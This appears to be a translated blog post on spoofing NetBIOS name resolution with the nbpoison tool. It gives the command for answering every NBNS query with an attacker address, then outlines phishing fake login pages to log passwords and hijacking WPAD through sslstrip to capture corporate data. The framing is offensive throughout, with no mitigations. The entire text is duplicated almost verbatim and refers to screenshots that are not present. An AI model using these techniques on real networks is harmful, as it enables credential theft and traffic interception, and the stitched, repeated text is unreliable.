January 26, 2010 at 18:26NetBIOS protocol susceptible to spoofing
A small introduction to the NetBIOS protocol.
When Windows tries to resolve a network name, Windows first accesses DNS. Further, if no one intervened in the DHCP request and replaced the DNS server with their own, and if no one made an ARP spoofing attack to redirect traffic, then the request will go to the specified DNS. In turn, DNS will provide the necessary IP address.
If the DNS query is not successful (for example, the DNS server is not available), then Windows will try to resolve the network name using the NetBIOS protocol (NBNS). It is NetBIOS resolution that allows you to ping SOMEPC (network name), and if SOMEPC is turned on and on the network, the SOMEPC name will be converted to an IP address. The most interesting thing is that it all boils down to a broadcast request - “Who owns SOMEPC?” And the computer that has the name SOMEPC will reply - “Hey, it's me!”.
But what prevents an attacker from impersonating SOMEPC (or any other name)?
One of the utilities in the NBTool package , called nbpoison, intercepts broadcast NBNS requests (NetBIOS Name Query packet) on the network and responds to them with addresses (NetBIOS Name Query Response packet) that sent the request, while replacing the IP address with your own. In addition, if you use the -c switch (conflict flag), the newly loaded host will receive a message that the name that is assigned to it is already in use on the network.
Those. the script will look like this:
FREDSBOX: (just booted up and registered on the network) - “Hey guys, for your attention - my name is on the FREDSBOX network”
Attacker: “No, dear, you are mistaken - I am FREDSBOX”.
FREDSBOX: “Okay, sorry.” (From now on, FREDSBOX will no longer respond to requests that come to his name)
And so, for example, we want to respond to all broadcast NBNS requests in the segment 172.21.49.0/24 with its address 172.21.49.129 and redirect all requests to our computer. To do this, run nbpoison with the parameters:
In the screenshot, we can see that when ping the nonexistent address NONAMESERVER1, the name is resolved and the ping is answered (echo-reply) from address 172.21.49.129, i.e. the one we specified in the parameters of the nbpoison utility. Another point worth paying attention to is that the nbpoison utility must be run as root (root), as the utility works with the privileged UDP port 137.
Now we will consider several types of attacks in practice:
Imagine a situation when the corporate DNS server for some reason became unavailable: for example, the uplink of the switch into which your network is physically (intentionally) turned off, or the router or firewall configuration failed, or the corporate DNS failed and your entire subnet didn’t can reach out to DNS.
Therefore, as mentioned above, Windows, when the network name resolving is not successful, tries to resolve using the NetBIOS (NetBIOS Name Service).
And so, as you can see, a Linux computer was used to replace the WEB page. Instead of this page, you could display a fake page of some popular mail service such as gmail or some kind of social network portal. And collect all entered passwords and log them.
The following type of attack, which we will consider, can be used to monitor WPAD requests and collect corporate confidential user data. This attack method may be applicable when the browser has the option “Automatically detect proxy settings for this network”. Both Internet Explorer and Mozilla Firefox support this feature so that the network administrator can automatically report the settings of the corporate proxy server. In this situation, replacing the NBNS request, we can tell the victim to use our WPAD script, which will redirect the request to ssltrip configured to listen on port 8080 and we can see a lot of interesting things.
When Windows tries to resolve a network name, Windows first accesses DNS. Further, if no one intervened in the DHCP request and replaced the DNS server with their own, and if no one made an ARP spoofing attack to redirect traffic, then the request will go to the specified DNS. In turn, DNS will provide the necessary IP address.
If the DNS query is not successful (for example, the DNS server is not available), then Windows will try to resolve the network name using the NetBIOS protocol (NBNS). It is NetBIOS resolution that allows you to ping SOMEPC (network name), and if SOMEPC is turned on and on the network, the SOMEPC name will be converted to an IP address. The most interesting thing is that it all boils down to a broadcast request - “Who owns SOMEPC?” And the computer that has the name SOMEPC will reply - “Hey, it's me!”.
But what prevents an attacker from impersonating SOMEPC (or any other name)?
NBTool
One of the utilities in the NBTool package , called nbpoison, intercepts broadcast NBNS requests (NetBIOS Name Query packet) on the network and responds to them with addresses (NetBIOS Name Query Response packet) that sent the request, while replacing the IP address with your own. In addition, if you use the -c switch (conflict flag), the newly loaded host will receive a message that the name that is assigned to it is already in use on the network.
Those. the script will look like this:
FREDSBOX: (just booted up and registered on the network) - “Hey guys, for your attention - my name is on the FREDSBOX network”
Attacker: “No, dear, you are mistaken - I am FREDSBOX”.
FREDSBOX: “Okay, sorry.” (From now on, FREDSBOX will no longer respond to requests that come to his name)
And so, for example, we want to respond to all broadcast NBNS requests in the segment 172.21.49.0/24 with its address 172.21.49.129 and redirect all requests to our computer. To do this, run nbpoison with the parameters:
sudo ./nbpoison -s 172.21.49.129In the screenshot, we can see that when ping the nonexistent address NONAMESERVER1, the name is resolved and the ping is answered (echo-reply) from address 172.21.49.129, i.e. the one we specified in the parameters of the nbpoison utility. Another point worth paying attention to is that the nbpoison utility must be run as root (root), as the utility works with the privileged UDP port 137.
Now we will consider several types of attacks in practice:
Imagine a situation when the corporate DNS server for some reason became unavailable: for example, the uplink of the switch into which your network is physically (intentionally) turned off, or the router or firewall configuration failed, or the corporate DNS failed and your entire subnet didn’t can reach out to DNS.
Therefore, as mentioned above, Windows, when the network name resolving is not successful, tries to resolve using the NetBIOS (NetBIOS Name Service).
And so, as you can see, a Linux computer was used to replace the WEB page. Instead of this page, you could display a fake page of some popular mail service such as gmail or some kind of social network portal. And collect all entered passwords and log them.
The following type of attack, which we will consider, can be used to monitor WPAD requests and collect corporate confidential user data. This attack method may be applicable when the browser has the option “Automatically detect proxy settings for this network”. Both Internet Explorer and Mozilla Firefox support this feature so that the network administrator can automatically report the settings of the corporate proxy server. In this situation, replacing the NBNS request, we can tell the victim to use our WPAD script, which will redirect the request to ssltrip configured to listen on port 8080 and we can see a lot of interesting things.